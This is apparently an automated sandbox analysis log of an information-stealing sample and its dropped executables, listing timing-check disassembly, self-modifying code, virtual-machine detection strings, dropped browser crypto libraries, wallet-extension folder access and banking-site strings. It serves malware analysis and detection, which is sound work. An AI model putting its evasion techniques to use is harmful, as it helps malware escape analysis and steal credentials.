Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB05A7 second address: 4EB05FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 249ED28Bh 0x00000012 pushad 0x00000013 mov cx, C3E3h 0x00000017 pushad 0x00000018 mov ebx, ecx 0x0000001a pushfd 0x0000001b jmp 00007F7FDD3F1872h 0x00000020 sub eax, 42EF8428h 0x00000026 jmp 00007F7FDD3F186Bh 0x0000002b popfd 0x0000002c popad 0x0000002d popad 0x0000002e push 726A1579h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB05FB second address: 4EB0601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0601 second address: 4EB0607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 15ED6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 15EE83 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 15ED72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 306BC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Special instruction interceptor: First address: 32B6B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: F7ED6C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: F7EE83 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: F7ED72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1126BC9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 114B6B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Code function: 8_2_04F00D13 rdtsc 8_2_04F00D13
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3219
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2211
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1113
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1076
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 405
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1431
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1505
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\Rnteb46TuM.exe API coverage: 0.8 %
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6532 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2876 Thread sleep count: 1113 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2876 Thread sleep time: -2227113s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5224 Thread sleep count: 1076 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5224 Thread sleep time: -2153076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7064 Thread sleep count: 405 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7064 Thread sleep time: -12150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 416 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280 Thread sleep count: 1431 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280 Thread sleep time: -2863431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7052 Thread sleep count: 1505 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7052 Thread sleep time: -3011505s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C7AC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\Rnteb46TuM.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: EBFBKFBG.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000B.00000002.2400723434.0000000001107000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.3033534217.0000000001107000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: EBFBKFBG.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: EBFBKFBG.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000086C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000077C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: EBFBKFBG.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000086C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000077C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000086C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000077C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: EBFBKFBG.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: EBFBKFBG.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: AFBFHDBKJE.exe, 00000008.00000002.2352184235.00000000002E7000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000A.00000002.3337947357.0000000001107000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000B.00000002.2400723434.0000000001107000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.3033534217.0000000001107000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: EBFBKFBG.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.6.dr Binary or memory string: VMware
